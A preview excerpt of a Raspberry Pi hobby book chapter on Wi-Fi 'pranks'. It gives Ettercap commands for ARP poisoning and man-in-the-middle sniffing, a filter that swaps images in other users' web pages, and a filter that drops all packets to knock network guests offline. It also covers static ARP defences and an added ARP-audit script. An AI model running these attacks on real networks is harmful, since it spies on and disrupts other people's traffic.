
You're reading from  Raspberry Pi for Secret Agents

Product type: Book
Published in: Apr 2013
Publisher: Packt
ISBN-13: 9781849695787
Edition: 1st Edition
Author: Stefan Sjogelid

Stefan Sjogelid grew up in the 1980s in Sweden, getting hooked on 8-bit consoles, Amigas, and BBSes. With a background in system and network administration, he packed his bags for Southeast Asia and continued to work in IT for many years, before love and a magic 8 ball told him to seek new opportunities in the North American continent. The Raspberry Pi is the latest gadget to grab Stefan's attention, and after much tinkering and learning a great deal about the unique properties of the Pi, he launched the PiLFS website (http://www.intestinate.com/pilfs), which teaches readers how to build their own GNU/Linux distribution and applications that are particularly useful on Raspberry Pi.

Chapter 4. Wi-Fi Pranks – Exploring your Network

In this age of digital information, a secret agent must be able to handle computer networks with ease. The intricate details of protocols and network packets are still shrouded in mystery to most people. With this chapter, you'll gain the advantage by simply picking up and looking closer at the network signals that surround all of us every day.

We'll start off by analyzing the Wi-Fi traffic around the house, and then we'll map out your local network in more detail so that you can pick out an interesting target for your network pranks. You'll not only learn how to capture, manipulate, and spy on your target's network traffic but also how to protect yourself and your network from mischief.

Getting an overview of all the computers on your network


When analyzing Wi-Fi networks in particular, we have to take the borderless nature of radio signals into account. For example, someone could be parked in a car outside your house running a rogue access point and tricking the computers inside your home into sending all their traffic through this nefarious surveillance equipment. To be able to detect such attacks, you need a way of monitoring the airspace around your house.

Monitoring Wi-Fi airspace with Kismet

Kismet is a Wi-Fi spectrum and traffic analyzer that relies on your Wi-Fi adapter's ability to enter something called monitor mode. You should be aware that not all adapters and drivers support this mode of operation. Your best bet is to look for an adapter based on the Atheros chipset, but Kismet will try to detect and use any adapter—just give yours a try and let others know about it on the Raspberry Pi forums (http://www.raspberrypi.org/phpBB3/).

Since your Wi-Fi adapter will be...

Finding out what the other computers are up to


Now that we have a better idea of the computer behind each IP address, we can begin to target the network traffic itself as it flows through our network.

For these experiments we'll be using an application called Ettercap. The act of listening in on network traffic is commonly known as sniffing and there are several great sniffer applications to choose from. What sets Ettercap apart is its ability to combine man-in-the-middle attacks with network sniffing and a bunch of other useful features, making it an excellent tool for network mischief.

You see, one obstacle that sniffers have to overcome is how to obtain network packets that aren't meant for your network interface. This is where Ettercap's man-in-the-middle attack comes into play. We will launch an ARP poisoning attack that will trick any computer on the network into sending all its network packets through the Pi. Our Pi will essentially become the man in the middle, secretly spying...

Pushing unexpected images into browser windows


Not only do man-in-the-middle attacks allow us to spy on the traffic as it passes by, we also have the option of modifying the packets before we pass them on to their rightful owner. To manipulate packet contents with Ettercap, we will first need to build some filter code in nano:

pi@raspberrypi ~ $ nano myfilter.ecf

The following is our filter code:

if (ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Mischief");
  }
}

if (ip.proto == TCP && tcp.src == 80) {
  if (search(DATA.data, "<img")) {
    replace("src=", "src=\"http://www.gnu.org/graphics/babies/BabyGnuTux-Small.png\" ");
    replace("SRC=", "src=\"http://www.gnu.org/graphics/babies/BabyGnuTux-Small.png\" ");
    msg("Mischief Managed!\n");
  }
}

The first block looks for any TCP packets with a destination of port 80. That is, packets that a web browser sends to a web server to request pages. The...

Knocking all visitors off your network


There are times in every network owner's life when we just need that little extra bandwidth to watch the latest cat videos on YouTube in glorious HD resolution, right?

With the following Ettercap filter, our Pi will essentially become a very restrictive firewall and drop every single packet that comes our way, thus forcing the guests on our network to take a timeout:

pi@raspberrypi ~ $ nano dropfilter.ecf

Here is our minimalistic drop filter:

if (ip.proto == TCP || ip.proto == UDP) {
  drop();
  msg("Dropped a packet!\n");
}

The next step is to compile our Ettercap filter code into a binary file that can be interpreted by Ettercap, using the following command:

pi@raspberrypi ~ $ etterfilter dropfilter.ecf -o dropfilter.ef

Now all we have to do is fire up Ettercap and load the filter. You can either target one particularly pesky network guest or a range of IP addresses:

pi@raspberrypi ~ $ sudo ettercap -q -T -i wlan0 -M arp -F dropfilter.ef:1 /[target]...

Protecting your network against Ettercap


By now you might be wondering if there's a way to protect your network against the ARP poisoning attacks we've seen in this chapter.

The most common and straightforward defense is to define static ARP entries for important addresses on the network. You could do this on the router, if it has support for static ARP entries, and/or directly on each machine connected to the network.

Defining static ARP entries on a router running Tomato firmware

Most operating systems will display the ARP table with the arp -a command.

To turn a dynamic ARP entry for the router into a static entry on Windows, open a command prompt as Administrator and type in the following command, but replace [Router IP] and [Router MAC] with the IP and MAC address of your router:

C:\> netsh -c "interface ipv4" add neighbors "Wireless Network Connection" "[Router IP]" "[Router MAC]"

The Wireless Network Connection argument might need to be adjusted to match the name of your interface...
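
The check below is an added example, not code from the book: it parses arp -a output in the Linux and Windows layouts and reports two symptoms of ARP poisoning, a router entry that no longer matches its known MAC address and one MAC address answering for several IPs. The addresses, sample tables, and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# IPv4 address, then a MAC with ':' (Linux/macOS) or '-' (Windows) separators.
ENTRY = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3})\D.*?\b((?:[0-9A-Fa-f]{1,2}[:-]){5}[0-9A-Fa-f]{1,2})\b")
BROADCAST = "ff:ff:ff:ff:ff:ff"  # legitimately shared by several addresses

# Constructed sample output: the router and another host answer with one MAC.
LINUX_SAMPLE = """\
? (192.168.1.1) at b8:27:eb:aa:bb:cc [ether] on wlan0
? (192.168.1.66) at b8:27:eb:aa:bb:cc [ether] on wlan0
? (192.168.1.50) at <incomplete> on wlan0
"""
WINDOWS_SAMPLE = """\
Interface: 192.168.1.23 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           b8-27-eb-aa-bb-cc     dynamic
  192.168.1.66          b8-27-eb-aa-bb-cc     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
"""
PINNED = {"192.168.1.1": "00-1A-2B-3C-4D-5E"}  # constructed router IP/MAC

def normalize_mac(mac):
    """Lower-case, colon-separated, zero-padded octets."""
    return ":".join(p.zfill(2) for p in re.split(r"[:-]", mac.lower()))

def parse_arp_table(text):
    """Return {ip: mac} from arp -a output; header/incomplete lines are skipped."""
    found = (ENTRY.search(line) for line in text.splitlines())
    return {m.group(1): normalize_mac(m.group(2)) for m in found if m}

def audit(table, pinned):
    """List pinned addresses whose MAC changed and MACs claimed by several IPs."""
    findings = []
    for ip, mac in pinned.items():
        seen = table.get(ip)
        if seen and seen != normalize_mac(mac):
            findings.append(f"MISMATCH {ip}: expected {normalize_mac(mac)}, saw {seen}")
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1 and mac != BROADCAST:
            findings.append(f"SHARED {mac}: {', '.join(sorted(ips))}")
    return findings

if __name__ == "__main__":
    for sample in (LINUX_SAMPLE, WINDOWS_SAMPLE):
        print("\n".join(audit(parse_arp_table(sample), PINNED)))
```

On a machine where the router entry has been made static, the first check stays quiet for that address, while the second still shows when another host on the network is answering for more than one IP.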

Analyzing packet dumps with Wireshark


Most sniffers have the capability to produce some kind of logfile, or raw packet dump, containing all the network traffic that they pick up. Unless you're Neo from The Matrix, you're not expected to stare at the monitor and decipher the network packets live as they scroll by. Instead, you'll want to open up your logfile in a good traffic analyzer and start filtering the information so that you can follow the network conversation you're interested in.

Wireshark is an excellent packet analyzer that can open up and dissect packet logs in a standard format called pcap. Kismet already logs to pcap format by default and Ettercap can be told to do so with the -w argument, as in the following command:

pi@raspberrypi ~ $ sudo ettercap -q -T -i wlan0 -M arp:remote -d -w mycapture.pcap /[Router IP]/ /[PC IP]/

The only difference when running Ettercap with pcap logging is that it logs every single packet it can see, whether it matches the target specification or not, which...

Summary


We started this chapter by focusing on the general airspace surrounding the Wi-Fi network in our home. Using the Kismet application, we learned how to obtain information about the access point itself and any associated Wi-Fi adapters, as well as how to protect our network from sneaky rogue access points.

Shifting the focus to the insides of our network, we used the Nmap software to quickly map out all the running computers on our network and we also looked at the more advanced features of Nmap that can be used to produce a detailed HTML report about each connected machine.

We then moved on to the fascinating topics of network sniffing, ARP poisoning, and man-in-the-middle attacks with the frightfully effective Ettercap application. We saw how to use Ettercap to spy on network traffic and web browsers, how to manipulate HTML code in transit to display unexpected images, and how to drop packets to keep your network guests from hogging up all the juicy bandwidth.

Thankfully, there are...
